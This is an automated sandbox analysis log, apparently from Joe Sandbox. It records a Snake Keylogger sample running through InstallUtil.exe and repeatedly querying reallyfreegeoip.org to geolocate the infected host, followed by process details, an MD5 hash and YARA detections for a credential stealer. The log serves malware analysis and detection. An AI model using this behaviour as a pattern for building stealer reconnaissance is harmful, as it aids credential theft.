                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfac2eae543d5-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:39 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:39 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          9 | 192.168.2.6 | 49745 | 188.114.97.3 | 443 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:40 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:40 UTC | 704 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:40 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40944
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXeSNPPsKO3sOVIuCIUFtUTPBira8rvm6CGkvTDu7lDBQdsftn0lzoEFjBOnlzPFyswVeZSFkjJrxNXHk5CQfY%2BLYOr8sFoy4wwn4TlpKk4S%2B6Ck4THEZHJSBSXipSoIFWq8rLLB"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfac8be9c9e02-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:40 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:40 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          10 | 192.168.2.6 | 49747 | 188.114.97.3 | 443 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:41 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:41 UTC | 710 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:41 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40945
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BG9gc7BeM72Zfbuq8MPFIdBUr%2BKSWx1YrCnfEueHZfQGubXBBgAysLhbAR5HKkYaZ7wo70khSiv8UPwgl9%2FY%2BHxutSwdkuEtZXQkH45YCLXy3W8FTmKYqpg%2B1HAQMp48OoTkQ11H"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfad05c8943ab-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:41 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:41 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          11 | 192.168.2.6 | 49751 | 188.114.97.3 | 443 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:42 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:42 UTC | 704 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:42 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40946
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYtNetDKKo6Q9%2BE%2BDe4P8GsZZOJka6S2bivFrNVUmls0F5SfbxjkDGENKuNK7RgJ5HnXgC8f4skHUJXTw6RzwmjR9D8EhDq8LpcdHP4NiNS5AW5oVcusoZzjXr3ueyVV8arKIObM"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfad7ffa41a1b-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:42 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:42 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          12 | 192.168.2.6 | 49753 | 188.114.97.3 | 443 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:43 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:44 UTC | 712 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:43 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40947
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2BH8WR%2F5TaayG5aoUQHeWl%2BW%2Bs0TU49DTBD7vc8fahbSkSjiw7YfDdzymOFvQGgM4il8IXO7Wg%2BxtVdLtt9iR6ML%2FxOJPpqcOw9yFUeFRCPC7AtS7HjucgIN9oycW5gX4BsWlFv9"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfadfba37330c-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:44 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:44 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          13 | 192.168.2.6 | 49755 | 188.114.97.3 | 443 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:45 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:46 UTC | 693 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:46 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: MISS
                          Last-Modified: Tue, 27 Aug 2024 18:03:46 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IOvaIUalndN5DGGNQo0UJ5a1rgX379gZDTXSHwuS1WTB2S%2BmkU0jZdl%2B6kMvNpxG1oOAx2FxwEIHASLck65INc7EicTzl4bFrkEL11N64EQ3xKJjYFqtgVm7qukiWyd0RKxAmBg"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfaec695f822d-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:46 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:46 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          14 | 192.168.2.6 | 49758 | 188.114.97.3 | 443 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:47 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:47 UTC | 708 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:47 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40951
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBKAbumFiymj85vnbWsjVRqwkUG79n5%2BevRzt8%2BzgjqzdJjLKHc4S9xX27k5raAeFC0P00UYWfEieWSJJWk52VU0z7hjLaxmbifyUglCs0NtFl36md%2BJzHObKSRHuMASwL%2BeCNL8"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfaf598679e17-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:47 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:47 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          15 | 192.168.2.6 | 49759 | 188.114.97.3 | 443 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:48 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:48 UTC | 704 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:48 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40952
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e8LkuvZrkIuFLeGJ1dXv62hP5Ic22yuK1eDNWScoPQ8HepCuhU6aAjkXKk8KAxR8FyKQ7r0MfQzvoeiEircfPDo%2B0DidcPs9aZVF7mulBrezs1aKe%2BCrU5i56ccFRXwpYmR5M25V"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfafcee1f19e7-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:48 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:48 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          16 | 192.168.2.6 | 49760 | 188.114.97.3 | 443 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:48 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:48 UTC | 714 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:48 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40952
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wr0g%2F7aAHAzbbV%2BRMfsl5v5mX1IgW%2B8cVEjn%2BkX1%2BDKe3mK1L1RlDm0r9fsqK8z4rGvWSOW3yfIwAdjmTaIQWUlz%2FEkPv6SVoexPiot1OXXI0%2BAoaT6qi8YcEfMFgPKzYrGYyVTc"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfafd6cc3434a-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:48 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:48 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          17 | 192.168.2.6 | 49763 | 188.114.97.3 | 443 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:50 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:50 UTC | 702 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:50 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40954
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mmjknL6ZUqfMljjd6Cgns8aODANo95tkXmeiDwkYJHeMII35LX64N9zT0ttJJVogTwTLnEZCyK3hLUeg%2Brwd4EhiQuckVHnNcRk5x07zuCOv0Mu0AUjF388LoySzflQaqv9jrrY3"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb07d9059e17-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:50 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:50 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          18 | 192.168.2.6 | 49764 | 188.114.97.3 | 443 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:50 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:50 UTC | 714 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:50 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40954
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YssmRAr6U3hRER3e7d%2FjS2qspk2psnIFoFOpYjC6gPxHV4coUkEIhHJmfWV2WoLmf7gvl81etvR9zhiRg2ym%2BiE3Glwy8FM%2BuvRVLcTbuwTrBHi5vsO%2FgQ%2BOjpNZOe1TmW5%2BE8%2Fv"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb085dc2434b-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:50 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          19 | 192.168.2.6 | 49766 | 188.114.97.3 | 443 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:51 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:51 UTC | 702 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:51 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40955
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asPWVoshW40tUEHH5RCVIf4t0SUJPO757DID972GeYwIIPNYrXYoHtxy1PRTkXH9POoAL0xvJKxNOu0Xb%2B8tZ97dfaUUortdFNKFUWis810GCcAxYP0DEHP6sA87YzMsFBLIeaRk"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb0fe92d0ca1-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:51 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          20 | 192.168.2.6 | 49768 | 188.114.97.3 | 443 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:53 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:53 UTC | 708 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:53 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40957
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Htk7kjzz5WrSAC7JZAs1YW5hro01R%2BcZTmDiQkCMAsA4RXA3sEbEAQb34bSo%2FD4zY%2F3Z1D0YAE8aAu4jMxA%2BsrX91MZ6cKH5Mieg3NK5VoY708GDegNm5SEqILyUwoJNGgJ6ljV"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb1bab3d41d3-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:53 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          21 | 192.168.2.6 | 49770 | 188.114.97.3 | 443 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:55 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:55 UTC | 708 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:55 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40959
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aP2MNREHUOsIGd7IEyIkqMu9EjshRuYj461A%2Fr6G%2FZEs7BLfSvZi1eFxOjRlDaXkTLu84EVz4A7pM8fpigA5XBe21BEQaz%2Fp00JaND3F%2FnfwUFLbPwFaevF7oIkNaz4QrogfcYAO"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb266bec80cd-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:55 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          22 | 192.168.2.6 | 49774 | 188.114.97.3 | 443 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:57 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:57 UTC | 706 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:57 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40961
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zbekfax7D1LkAQtVvpu4E877EIEayCs3RD8NGxwBy1SqcDWcFloQTvYvWFTvOuMGhNCuL41J3SD2%2FfO2kbzuVWCRgsrABg5L9BzRUicvEY5tvTDHMw51L%2BPGEJqtMqM2TUMP9c%2Bw"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb324fda43fa-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:57 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          23 | 192.168.2.6 | 49777 | 188.114.97.3 | 443 | 1596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 18:03:58 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:58 UTC | 706 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:58 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40962
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XM%2FK1NhqmCcIJQwRN1RT2J7BWPXDzAhJ%2FFO0XbwGGs5TOYFquuHeXk42eCk5iGCsvPL1RtlYlp0RiZUlidrX5diQcVEktEIyVWzgtPJ9kb0UjXweluUR25yQOJyj%2FIHjimp29PNk"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb3a1ece726f-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:58 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Target ID:1
                          Start time:14:03:03
                          Start date:27/08/2024
                          Path:C:\Users\user\Desktop\doc1.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\doc1.exe"
                          Imagebase:0x620000
                          File size:1'118'840 bytes
                          MD5 hash:FDDD99D918C32A807CD1761C519B086B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
